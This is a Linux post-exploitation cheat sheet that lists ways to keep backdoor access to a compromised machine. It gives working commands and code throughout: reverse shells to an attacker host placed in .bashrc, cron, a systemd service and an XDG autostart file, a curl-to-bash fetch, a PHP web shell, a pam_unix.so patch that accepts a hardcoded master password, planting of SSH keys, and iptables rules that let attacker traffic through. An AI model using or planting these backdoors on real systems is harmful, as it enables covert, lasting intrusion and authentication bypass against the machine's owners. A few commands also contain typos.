Linux Backdoors
Last modified: 2024-09-10
After compromising a target machine, the adversary attempts to establish persistent access. This page lists some methods of backdoors in Linux for persistence.
.bashrc
Add this line to /root/.bashrc or /home/<user>/.bashrc to gain access to target machine by reverse shell when the victim user logged in.
bash -i >& /dev/tcp/10.0.0.1/4444
Of course we need to always open netcat listener to be able to fetch incoming connection from the target.
nc -lvnp 4444
Cron
Add the following line to the cron file like /etc/crontab in the target machine.
Replace 10.0.0.1 with your ip address.
* * * * * root curl http://10.0.0.1/shell | bash
Create a file named "shell" in local machine.
Replace 10.0.0.1 with your ip address.
#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
Now start local web server and listener in each terminal in local machine.
# Terminal 1
# We need to start this in the directory where our 'shell' file is located.
sudo python3 -m http.server 80
# Terminal 2
nc -lvnp 4444
Once the cron job downloads the “shell” file, run “bash” command to execute the “shell”.
We should gain access to the target shell.
pam_unix.so
The pam_unix.so module is likely located in /usr/lib/security or /usr/lib/x86_64-linux-gnu/security directory. It automatically detects and uses shadow passwords to authenticate users.
See this line in the pam_unix.so.
...
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
name = p = NULL;
...
Modify this line to as below.
...
/* verify the password of this user */
if (strcmp(p, "hackyou123") != 0) {
retval = _unix_verify_password(pamh, name, p, ctrl);
} else {
retval = PAM_SUCCESS;
}
name = p = NULL;
AUTH_RETURN;
...
Whenever you login to the target system using the password “hackyou123”, you can successfully login.
PHP
1. Create a Payload
Create a php file (e.g. shell.php) into /var/www/html.
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
Leave the php file in /var/www/html.
2. Reverse Shell
After that, start a listener for receiving the outcomming connection.
nc -lvnp 4444
Now access to the web page as below.
Replace <local-ip> with your ip address.
http://<target-ip>/shell.php?cmd=bach -i >& /dev/tcp/<local-ip>/4444 0>&1
We should get a shell.
SSH
We can establish a backdoor to allow us to be able to connect the target SSH server anytime by leaving our public key in the target machine.
1. Generate a New SSH key
First off, run the following command to generate SSH key.
ssh-keygen
It will generate two keys, private key (id_rsa) and public key (id_rsa.pub).
2. Transfer Our SSH Public Key to Target System
If there is no .ssh directory in target, we need to create it.
mkdir .ssh
Then put our public key (id_rsa.pub) into /root/.ssh or /home/<user>/.ssh in the target machine.
scp command can be used for transfering it. Replace <target-user> and <target-iip> depending on your target.
scp ./id_rsa.pub <target-user>@<target-ip>:/root/.ssh/
# or
scp ./id_rsa.pub <target-user>@<target-ip>:/home/<target-user>/.ssh/
3. Add the Public Key Content to authorized_keys
Also we need to add the content of our id_rsa.pub to the target authorized_keys file.
cat id_rsa.pub >> authorized_keys
4. Change Permission of SSH
In target machine, we need to set the right permissions of the file/directory. Otherwise we cannot connect SSH.
Replace <target-user> with your target.
chmod 700 /root
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
# or
chmod 700 /home/<target-user>
chmod 700 /home/<target-user>/.ssh
chmod 600 /home/<target-user>/.ssh/authorized_keys
5. Connect to SSH Anytime
After that, we can connect to the target SSH when we want to connect it as long as the public key in .ssh directory is not removed. Before connecting, we need to modify the permission of our private key in local.
chmod 600 private_key
Now we can connect to SSH of the target.
ssh root@<target-ip> -i private_key
# or
ssh <target-user>@<target-ip> -i private_key
Systemd
We can use systemd as a backdoor because an arbitrary command will be executed when a service start.
The command is stored in [Services] section in the configuration file.
1. Create a New Systemd Config File
Create /etc/systemd/system/backdoor.service in target machine.
This service will execute reverse shell when starting.
Replace <local-ip> with your ip address.
[UNIT]
Description=Backdoor
[Service]
Type=simple
ExecStart=/bin/bash -i >& /dev/tcp/<local-ip>/4444 0>&1
[Install]
WantedBy=multi-user.target
Then enable the service.
systemctl enable backdoor
Now this service will start when the target system boots.
2. Wait for Reverse Connecting
We need to leave the netcat listener running in local machine.
nc -lvnp 4444
Then we'll get a shell anytime the service starts.
XDG Autostart
Reference: TryHackMe
Autostart is also used for persistence. First create a $HOME/.config/autostart directory if it does not exist and create a new file with arbitrary name as below:
mkdir -p /home/<user>/.config/autostart
touch /home/<user>/.config/autostart/evil.desktop
Then write a malicious code in this file:
# /home/<users>/.config/autostart/evil.desktop
[Desktop Entry]
Type=Application
Name=Test
Exec=/bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
After that, the command at the Exec field will be executed when the target user logs in.
We need to keep opening a listener in attack machine for receiving incoming connection:
nc -lvnp 4444
Option: Firewall Bypass
If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege.
# List the iptables settings
iptables --list
# ACCEPT: TARGET => ATTACKER
# OUTPUT 1: The first rule of the OUTPUT chain.
# -d: Destination address
iptables -I OUTPUT 1 -p tcp -d <attacker-ip> -j ACCEPT
# ACCEPT: TARGET <= ATTACKER
# INPUT 1: The first rule of the INPUT chain.
# -s: Source address
iptables -I INPUT 1 -p tcp -s <attacker-ip> -j ACCEPT